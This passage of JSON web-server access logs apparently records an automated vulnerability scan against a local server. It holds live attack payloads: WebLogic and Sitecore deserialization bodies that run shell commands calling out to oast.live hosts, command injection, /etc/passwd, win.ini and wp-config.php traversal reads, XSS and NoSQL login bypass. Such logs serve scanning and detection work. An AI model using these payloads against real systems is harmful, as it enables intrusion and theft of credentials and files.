HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"2.416","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /tmui/tmui/login/welcome.jsp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.301","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /axis2/axis2-web/HappyAxis.jsp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.409","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:30 +0000","request_body":"\x0D\x0A\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A /bin/bash\x0D\x0A \x0D\x0A \x0D\x0A -c\x0D\x0A \x0D\x0A \x0D\x0A nslookup c9oms3gsmpve1ijt0mc0db98eyptb6ay8.oast.live\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /wls-wsat/CoordinatorPortType HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.163","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.337","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cgi-bin/nobody/Machine.cgi?action=get_capability HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.420","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.jsp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.405","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.395","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"{\x0D\x0A \x22auth\x22: {\x0D\x0A \x22user\x22: {\x0D\x0A \x22$eq\x22: \x22admin\x22\x0D\x0A },\x0D\x0A \x22password\x22: [\x0D\x0A 0\x0D\x0A ]\x0D\x0A }\x0D\x0A}\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /auth/check HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.464","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /axis/happyaxis.jsp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.338","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /server_import.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.386","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /e/ViewImg/index.html?url=javascript:alert(document.domain) HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.451","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"2.523","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"-","request":"GET /hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-includes/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.291","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /community/?foro=signin&redirect_to=https://example.com/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.418","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /html/setup.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.311","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /emswebclient/Login.aspx HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.453","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"echo\x0D\x0Aecho\x0D\x0Acat /etc/passwd 2>&1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"4.935","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /static?/%2557EB-INF/web.xml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.312","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /ui HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.343","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /main/blank?message_error=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.309","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"\x0D\x0A\x0D\x0A \x0D\x0A foo\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 2\x0D\x0A \x0D\x0A <_comparison z:Id=\x224\x22 z:FactoryType=\x22a:DelegateSerializationHolder\x22 z:Type=\x22System.DelegateSerializationHolder\x22 z:Assembly=\x220\x22\x0D\x0A xmlns=\x22http://schemas.datacontract.org/2004/07/System.Collections.Generic\x22\x0D\x0A xmlns:a=\x22http://schemas.datacontract.org/2004/07/System\x22>\x0D\x0A \x0D\x0A mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A Compare\x0D\x0A \x0D\x0A \x0D\x0A System.String\x0D\x0A System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\x0D\x0A \x0D\x0A Start\x0D\x0A \x0D\x0A System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\x0D\x0A System.Diagnostics.Process\x0D\x0A System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A System.Diagnostics.Process Start(System.String, System.String)\x0D\x0A System.Diagnostics.Process Start(System.String, System.String)\x0D\x0A 8\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A Int32 Compare(System.String, System.String)\x0D\x0A System.Int32 Compare(System.String, System.String)\x0D\x0A 8\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 2\x0D\x0A \x0D\x0A /c nslookup c9oms3gsmpve1ijt0mc0rkycercsfzgaq.oast.live\x0D\x0A cmd\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.357","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /labkey/__r1/login-login.view?returnUrl=http://example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.312","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /PMA/server_import.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.313","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /fcgi-bin/wgsetcgi HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.251","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.github/workflows/push.yml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.366","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /axis2-web/HappyAxis.jsp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.356","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.326","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /mgmt/tm/sys/management-ip HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.736","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"$(id>webLib/x)","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"PUT /SDK/webLanguage HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.987","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"user=pdnuclei%20%26%20echo%20%cG9jLXRlc3Rpbmc%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd=pdnuclei","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /actions/authenticate.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.349","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.314","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /admin-ng/login.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.271","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /Login.aspx HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.271","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.389","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /concat?/%2557EB-INF/web.xml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.316","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /fuel/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.389","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /happyaxis.jsp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.270","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cliniccases/lib/php/data/messages_load.php?type=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.330","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /user HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.253","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v1/nodes HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.407","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.442","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v1/namespaces/default/secrets HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.366","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /status?full HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.385","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /admin/server_import.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.382","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.github/workflows/lint.yml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.332","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /x HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.328","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /sitecore/admin/login.aspx HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.344","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/bbpress/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.325","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /XmlPeek.aspx?dt=\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5CWindows\x5C\x5Cwin.ini&x=/validate.ashx?requri HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.305","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"c\x02\x00H\x00\x04","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /mifs/.;/services/LogService HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.306","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"https://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /applications.pinpoint HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.337","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/swagger-ui.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.329","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /appliance/login.ns HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.400","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /configure/app/landing/welcome-srm-va.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.301","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /LTX_navi.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.324","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.390","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", 